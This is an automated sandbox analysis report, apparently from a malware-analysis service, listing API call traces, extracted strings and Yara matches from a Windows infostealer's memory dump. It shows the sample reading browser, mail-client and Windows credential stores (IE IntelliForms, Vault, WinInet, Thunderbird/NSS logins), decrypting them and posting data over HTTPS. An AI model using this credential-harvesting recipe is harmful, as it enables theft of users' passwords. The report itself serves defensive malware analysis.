                                                                                                      • Part of subcall function 00413B98: __EH_prolog.LIBCMT ref: 00413B9D
                                                                                                    • GetSystemMetrics.USER32 ref: 004388B4
                                                                                                    • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00438950
                                                                                                    • EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 004389AC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$NameSystemUser$DevicesDisplayEnumInfoMetrics$CloseComputerDefaultGlobalLocaleMemoryOpenQueryStatusValue_strftime
                                                                                                    • String ID: )!$ :TN$!;$(EJ( $)vl$+Hdd$.$/Ifc$/L_Z$00$0000$0000$1+$2'6i$2p]F$3>58$4L$5/$9}<)$:$@$F"#5-2)6$FPFY$JSRO$KKFK";QK$Qt$USED$V\$Wed Sep 8 00:01:38 2021$XLJH$Z$`bnx$aaaaaaaaaaaaa$am$g}$isut$j|5/$m{$qt$rRR_R 3?HR$s$t5q|$tcu/$v$x$x
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00436291
                                                                                                      • Part of subcall function 0043922A: __EH_prolog.LIBCMT ref: 0043922F
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,00000000,0000000A,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040), ref: 0043638B
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436398
                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 004363D1
                                                                                                    • wsprintfW.USER32 ref: 004363F9
                                                                                                    • RegOpenKeyExW.KERNEL32(80000002,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436418
                                                                                                    • RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436494
                                                                                                    • RegQueryValueExA.KERNEL32(00000076,?,00000000,000F003F,?,00000800,?,?,?,00000001,?,?,?,?,?,0048A6F8), ref: 00436639
                                                                                                    • RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043671A
                                                                                                    • RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436739
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043673E
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436743
                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043675A
                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 00436788
                                                                                                    • wsprintfW.USER32 ref: 004367B0
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00020019,00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 004367CF
                                                                                                    • RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043684B
                                                                                                    • RegQueryValueExA.ADVAPI32(00000076,?,00000000,000F003F,?,00000800,?,00000001,?,00000001,?,?,?,?,?,0048A6F8), ref: 004369DF
                                                                                                    • RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AC0
                                                                                                    • RegCloseKey.ADVAPI32(00000076,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436ADF
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE4
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436AE9
                                                                                                    • RegOpenKeyExW.KERNEL32(80000003,0047D410,00000000,00020019,?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B03
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436B13
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00436B3D
                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000001,?,00000800,00000000,00000000,00000000,00000000,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012), ref: 00436B85
                                                                                                    • wsprintfW.USER32 ref: 00436BB0
                                                                                                    • RegOpenKeyExW.KERNEL32(80000003,?,00000000,00020019,?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436BCF
                                                                                                    • RegEnumKeyExW.KERNEL32(?,00000000,?,283C115D,00000000,00000000,00000000,00000000,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040), ref: 00436C0B
                                                                                                    • wsprintfW.USER32 ref: 00436C3B
                                                                                                    • RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012), ref: 00436C5A
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00438A36,00000000,00000012,00000040,00000001), ref: 00436C67
                                                                                                    • RegQueryValueExA.ADVAPI32(?,tcu/,00000000,000F003F,?,00000800,?,?,?,?,?,?,?,?,00438A36,00000000), ref: 00436CE4
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 00436F90
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000000,0048A6F8,00438A36,00000000,00000012,00000040,00000001), ref: 0043716C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Close$Open$QueryValue$Enumwsprintf$H_prolog$EnvironmentIos_base_dtorVariable_strcatstd::ios_base::_
                                                                                                    • String ID: $!eHRQM@Xo@LD$%s\%s$/$<8$3$3>589}<)g}$6`_ECWZ$8$?$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$k$kKC$k`x|$|9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 00433887
                                                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00433B2C
                                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00433BAB
                                                                                                    • WriteFile.KERNEL32(00000000,?,00000010,?,00000000), ref: 00433BBE
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00433BC5
                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00433BD9
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00433BE8
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000800), ref: 00433BF9
                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00433C00
                                                                                                    • lstrlenA.KERNEL32 ref: 00433C17
                                                                                                    • lstrcpynA.KERNEL32(00000000,00000001), ref: 00433C2C
                                                                                                    • lstrlenA.KERNEL32(?), ref: 00433C39
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C48
                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00433C5F
                                                                                                    • lstrlenA.KERNEL32(?), ref: 00433C75
                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001), ref: 00433C88
                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000000,00000000,00000000,00000000), ref: 00433C99
                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000006,?,00000004), ref: 00433CBA
                                                                                                    • WinHttpSetOption.WINHTTP(00000000,00000005,000F4240,00000004), ref: 00433CC5
                                                                                                    • WinHttpConnect.WINHTTP(00000000,00000000,000001BB,00000000,?), ref: 00433D58
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00800100,?), ref: 00433E48
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,POST,00000000,00000000,00000000,00000000,00000100,?), ref: 00433EB6
                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,00000000,000000FF,00000008,?,?,00000000,?), ref: 00433F26
                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00433F4E
                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00433F64
                                                                                                    • WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00433F99
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00434048
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 00434052
                                                                                                    • CloseHandle.KERNEL32(?), ref: 0043405B
                                                                                                    • DeleteFileA.KERNEL32(?), ref: 00434064
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 0043406B
                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 00434075
                                                                                                    • HeapFree.KERNEL32(00000000), ref: 0043407C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Http$File$CloseHandle$Heap$OptionRequestlstrcpynlstrlen$ByteCharCreateDataDeleteMultiOpenProcessReadWide$AllocAvailableConnectDeallocateFreeH_prologQueryReceiveResponseSendSizeWrite
                                                                                                    • String ID: %[^:]://%[^/]%[^]$POST$https
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0042A341
                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 0042A395
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A3E2
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A41E
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A45E
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A499
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A4D5
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0042A50E
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A5D1
                                                                                                    • lstrcpyW.KERNEL32 ref: 0042A5EC
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A5F9
                                                                                                    • lstrcpyW.KERNEL32 ref: 0042A618
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A625
                                                                                                    • lstrcpyW.KERNEL32 ref: 0042A649
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A67D
                                                                                                    • lstrcpyW.KERNEL32 ref: 0042A69E
                                                                                                    • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 0042A7B5
                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0042A7C0
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A7D0
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 0042A85E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProclstrlen$lstrcpy$Library$FreeLoadVersion
                                                                                                    • String ID: vAULTgETiTEM$%$Internet Explorer$RCKU$^(?+2*=27p:22
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: swprintf
                                                                                                    • String ID: ,$/$7$:$:$<$C$H$N$Q$V$Z$\$_$f$h$s$v$}
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004210B6
                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,00000001,00000000), ref: 004210EB
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                      • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    • NSS_Init.NSS3(?,?,?,?,?,?), ref: 0042124D
                                                                                                    • NSS_Shutdown.NSS3(?,00000001,?,00000001,?,?,?), ref: 004225EB
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    • sqlite3_finalize.NSS3(?), ref: 004218A4
                                                                                                    • sqlite3_close.NSS3(?), ref: 004218B1
                                                                                                    • __fread_nolock.LIBCMT ref: 00421AB2
                                                                                                      • Part of subcall function 00427160: __EH_prolog.LIBCMT ref: 00427165
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$Deallocate$FolderInitPathShutdown__fread_nolock_strcatsqlite3_closesqlite3_finalize
                                                                                                    • String ID: %$&NIURHGKC$*-0$*LEX$1'$2:$6rkw$:,$<4$>6$F )4$Gy_H$Profiles$RD$ThunderBird$W9#$c.,9$logins$nt{w$v$xf
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004206E2
                                                                                                      • Part of subcall function 00435C6D: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000001), ref: 00435CB7
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                    • SetCurrentDirectoryA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00000000), ref: 004208B8
                                                                                                      • Part of subcall function 00420568: __EH_prolog.LIBCMT ref: 0042056D
                                                                                                    • LoadLibraryA.KERNEL32(00000000,?,00000000,00000000), ref: 00420BB1
                                                                                                    • GetProcAddress.KERNEL32(00000000,orr~hOHU), ref: 00420BFE
                                                                                                    • GetProcAddress.KERNEL32(00000000,575B5B46), ref: 00420C3E
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420C7A
                                                                                                    • GetProcAddress.KERNEL32(00000000,QJ00F[[W), ref: 00420CBB
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420CEF
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420D1D
                                                                                                    • GetProcAddress.KERNEL32(00000000,F[[W[`}|1.;0), ref: 00420D5C
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420D8C
                                                                                                    • GetProcAddress.KERNEL32(00000000,44415C5E), ref: 00420DCA
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420E08
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00420E38
                                                                                                    • GetProcAddress.KERNEL32(00000000,2A2F3230), ref: 00420E77
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$H_prolog$CurrentDirectoryEnvironmentLibraryLoadVariable_strcat
                                                                                                    • String ID: /,0$&$02/*$4du`|$FaOS$QJ00F[[W$orr~hOHU$yFE^
                                                                                                    • API String ID: 1501777685-1778109498
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,?,00000000), ref: 00429F82
                                                                                                    • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000,?,00000000), ref: 00429FA3
                                                                                                    • lstrlenW.KERNEL32(?,?,00000000), ref: 00429FB2
                                                                                                    • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00429FC5
                                                                                                    • CryptGetHashParam.ADVAPI32(00000000,00000002,?,?,00000000,?,00000000), ref: 00429FE8
                                                                                                    • wsprintfW.USER32 ref: 0042A024
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 0042A032
                                                                                                    • wsprintfW.USER32 ref: 0042A052
                                                                                                    • lstrcatW.KERNEL32(00000000,?), ref: 0042A060
                                                                                                    • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 0042A069
                                                                                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,00000000), ref: 0042A074
                                                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 0042A0BB
                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,0042A2AF,00000000,00000000,00000001,?), ref: 0042A0DE
                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0042A117
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
                                                                                                    • String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                                                                    • API String ID: 1004607082-2450551051
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: /$UT$in-gdi-devcaps-l1-1-0
                                                                                                    • API String ID: 0-3985708853
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(?), ref: 0042A156
                                                                                                    • lstrlenW.KERNEL32(00000002), ref: 0042A167
                                                                                                    • CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 0042A190
                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 0042A1D6
                                                                                                    • LocalFree.KERNEL32(?), ref: 0042A200
                                                                                                    • CredFree.ADVAPI32(?), ref: 0042A219
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
                                                                                                    • String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
                                                                                                    • API String ID: 186292201-3120203912
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                      • Part of subcall function 0041EFFF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,0041F1EE,00000002,?,00000000,00000244,?,?,0041F321,?,00000000,00000244), ref: 0041F032
                                                                                                    • _strcat.LIBCMT ref: 0041FEA9
                                                                                                    • _strcat.LIBCMT ref: 0041FF24
                                                                                                    • SystemTimeToFileTime.KERNEL32(?,000007BC), ref: 00420079
                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00420099
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FileTime$_strcat$LocalPointerSystem
                                                                                                    • String ID: /../$/..\$\../$\..\
                                                                                                    • API String ID: 3418985325-3885502717
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004373CB
                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,?), ref: 0043746F
                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?,?,?), ref: 004374BD
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 004374C6
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseDeallocateH_prologOpenQueryValue
                                                                                                    • String ID: Y+6$wEGGOW%E
                                                                                                    • API String ID: 2130659939-258343349
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004371FF
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,755524D0,00000000), ref: 0043721C
                                                                                                      • Part of subcall function 00412BD9: __EH_prolog.LIBCMT ref: 00412BDE
                                                                                                      • Part of subcall function 00413337: __EH_prolog.LIBCMT ref: 0041333C
                                                                                                      • Part of subcall function 00413337: std::locale::_Init.LIBCPMT ref: 0041335A
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0043736A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog$InformationInitIos_base_dtorTimeZonestd::ios_base::_std::locale::_
                                                                                                    • String ID: 9}<)g}$T$%A
                                                                                                    • API String ID: 3259846166-174459869
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CoCreateInstance.OLE32(0046DB80,00000000,00000015,0046DBA0,?), ref: 0042A244
                                                                                                    • StrStrIW.SHLWAPI(?,0047C394), ref: 0042A295
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0042A2B3
                                                                                                    • CoTaskMemFree.OLE32(?), ref: 0042A2C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeTask$CreateInstance
                                                                                                    • String ID: (
                                                                                                    • API String ID: 2903366249-3887548279
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FindClose.KERNELBASE(000000FF,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000,0041444D,?), ref: 0043EFE9
                                                                                                    • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F019
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F026
                                                                                                    • FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D), ref: 0043F040
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00414748,?,7FFFFFFF,?,00000000,0041444D,?,?,?,004135B9,0041444D,00000000), ref: 0043F04D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Find$ErrorFileFirstLast$Close
                                                                                                    • String ID:
                                                                                                    • API String ID: 569926201-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004344AF
                                                                                                    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,00488780,0000000F,00000001), ref: 004344ED
                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00434511
                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 004345DF
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC
                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,00000001,00000000,00000002,00000080,00000000), ref: 00434639
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00800100,?), ref: 004346B1
                                                                                                    • WinHttpOpenRequest.WINHTTP(00000000,GET,00000000,00000000,00000000,00000000,00000100,?), ref: 00434718
                                                                                                    • WinHttpSendRequest.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00434748
                                                                                                    • WinHttpReceiveResponse.WINHTTP(00000000,00000000), ref: 00434754
                                                                                                    • WinHttpQueryDataAvailable.WINHTTP(00000000,?), ref: 00434769
                                                                                                    • WinHttpReadData.WINHTTP(00000000,00000000,?,?), ref: 00434794
                                                                                                    • WriteFile.KERNEL32(?,00000000,?,CECED245,00000000), ref: 004347A9
                                                                                                    • GetLastError.KERNEL32 ref: 004347C4
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 004347CB
                                                                                                    • WinHttpCloseHandle.WINHTTP(00000000), ref: 004347D5
                                                                                                    • CloseHandle.KERNEL32(?,00000001,00000000,00000002,00000080,00000000), ref: 004347DE
                                                                                                    • WinHttpCloseHandle.WINHTTP(?), ref: 004347E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Http$CloseHandle$OpenRequest$ByteCharConnectDataFileMultiWide$AvailableCreateErrorH_prologLastQueryReadReceiveResponseSendWrite
                                                                                                    • String ID: %99[^:]://%99[^/]%99[^]$GET
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 004340B3
                                                                                                    • WinHttpOpen.WINHTTP(00000000,00000000,00000000,00000000,00000000,?,0047935B,00000000), ref: 00434101
                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,000001BB,00000000,?,?,?,?,0047935B,00000000), ref: 004341D0
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000,00000002,00000080), ref: 00438C85
                                                                                                      • Part of subcall function 00438C60: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000,?,?,?,?,0043462B,?,00000001,00000000), ref: 00438CCC
                                                                                                    • WinHttpConnect.WINHTTP(?,00000000,00000050,00000000,?,?,?,?,0047935B,00000000), ref: 0043422D
